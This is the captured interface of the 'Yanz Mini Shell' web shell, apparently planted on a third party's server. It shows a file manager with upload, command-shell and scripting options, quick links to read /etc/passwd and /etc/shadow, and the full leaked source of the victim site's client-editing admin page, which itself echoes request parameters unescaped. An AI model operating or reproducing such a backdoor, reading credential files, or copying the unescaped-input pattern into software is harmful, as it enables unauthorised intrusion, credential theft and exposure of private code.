Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
housgcjs
elaan.net
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php $path="admin/orna/"; require_once('admin/orna/db.php'); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <meta name="keyword" content=""> <title>Edit Client</title> <script src="assets/js/now.js"></script> <!-- Bootstrap core CSS --> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/orna.css" rel="stylesheet"> <!--external css--> <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" /> <link rel="stylesheet" type="text/css" href="assets/js/gritter/css/jquery.gritter.css" /> <!-- Custom styles for this template --> <link href="assets/css/style.css" rel="stylesheet"> <link href="assets/css/style-responsive.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> </head> <style> input, select, textarea, .select2-container--default .select2-selection--single{ text-transform:none !important; } </style> <body> <section id="container" > <!--header start--> <?php require_once('inc-core/header.inc')?> <!--header end--> <!--sidebar start--> <?php require_once('inc-core/side-bar.inc');?> <!--sidebar end--> <!--main content start--> <section id="main-content"> <section class="wrapper site-min-height"> <div class="loading"></div> <table class="table table-striped table-advance table-hover"> <thead> <tr> <th class="col-md-12"> <a href="#"> <button class="btn btn-theme btn-xs" id="up"><i class="fa fa-save"></i> Update</button> </a> </th> <th class="col-md-10"></th> </tr> </thead> </table> <!--content-start--> <div id="title"> <div class="row"> <div class="col-sm-12"> <h1>Manage Client</h1> <p>Please Edit the fields and press update to confirm changes!</p> </div> </div> </div> <div id="form-wrapper"> <form class="form-inline" id="form" role="form" action="admin/ajax/php/sv.php?t_name1=client_contracts&count=1&row=single&file=false&flimit=0&no_reply=false" method="POST"> <div class="row"> <div class="col-sm-4"> Company Name: <input type="text" class="form-control" placeholder="Company Name" name="name" id="client_name" required pattern="^[a-zA-Z][a-zA-Z0-9-_\.]{4,150}$"> </div> <div class="col-sm-4"> Mobile Number: <input type="tel" class="form-control" name="number" id="number" data-inputmask="'mask': '0399-9999999'" placeholder="03XX-XXXXXXX" required> </div> <div class="col-sm-4"> Landline Number (Optional): <input type="tel" class="form-control" name="landline" id="landline" data-inputmask="'mask': '0999999999'" placeholder="0XXXXXXXXX"> </div> <div class="clearfix"></div> <div class="col-sm-12"> Address: <textarea class="form-control" placeholder="Address" name="address" required></textarea> </div> <div class="clearfix"></div> <div class="col-sm-4"> Email: <input type="email" class="form-control" placeholder="Contact Email" name="email" id="email" required> </div> <div class="col-sm-4"> Company Coordinator: <input type="text" class="form-control" placeholder="Coordinator Name" name="coordinator" id="coordinator" required> </div> <div class="col-sm-4"> Contract Phase: <select type="text" class="form-control" name="phase" required disabled> <option value="created">Created</option> <option value="profile_sent">Company Profile Sent</option> <option value="proposal_sent">Proposal Sent</option> <option value="quoted">Quoted</option> <option value="plan_sent">Execution Plan Sent</option> <option value="contracted">Contract Started</option> <option value="rejected">Contract Rejected</option> <option value="invoicing">Invoicing</option> </select> </div> <div class="clearfix"></div> <input type="hidden" id="dt" value="<?php echo time();?>"> <input type="hidden" id="id" value="<?php echo $_GET['id']?>"> <input type="hidden" id="table" value="<?php echo $_GET['table']?>"> </div> </form> </div> <!--content-end--> </section><!--/wrapper --> </section><!-- /MAIN CONTENT --> <!--main content end--> <!--footer start--> <footer class="site-footer"> <div class="text-center"> <?php echo date("Y");?> - ProFinance <a href="#" class="go-top"> <i class="fa fa-angle-up"></i> </a> </div> </footer> <!--footer end--> </section> <!-- js placed at the end of the document so the pages load faster --> <script src="assets/js/jquery.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/jquery.scrollTo.min.js"></script> <script src="assets/js/jquery.nicescroll.js" type="text/javascript"></script> <!--script for this page--> <script type="text/javascript" src="assets/js/gritter/js/jquery.gritter.js"></script> <script type="text/javascript" src="assets/js/bootstrap-inputmask/inputmask_new.js"></script> <script src="admin/ajax/js/client.js" type="text/javascript"></script> <script src="admin/ajax/js/update.js"></script> <script> $(":input").inputmask(); </script> <!--common script for all pages--> <script src="assets/js/common-scripts.js"></script> <script src="assets/js/jquery-ui-1.9.2.custom.min.js"></script> <script src="assets/js/jquery.ui.touch-punch.min.js"></script> <script class="include" type="text/javascript" src="assets/js/jquery.dcjqaccordion.2.7.js"></script> </body> </html>
Free Space : 77943828480 Byte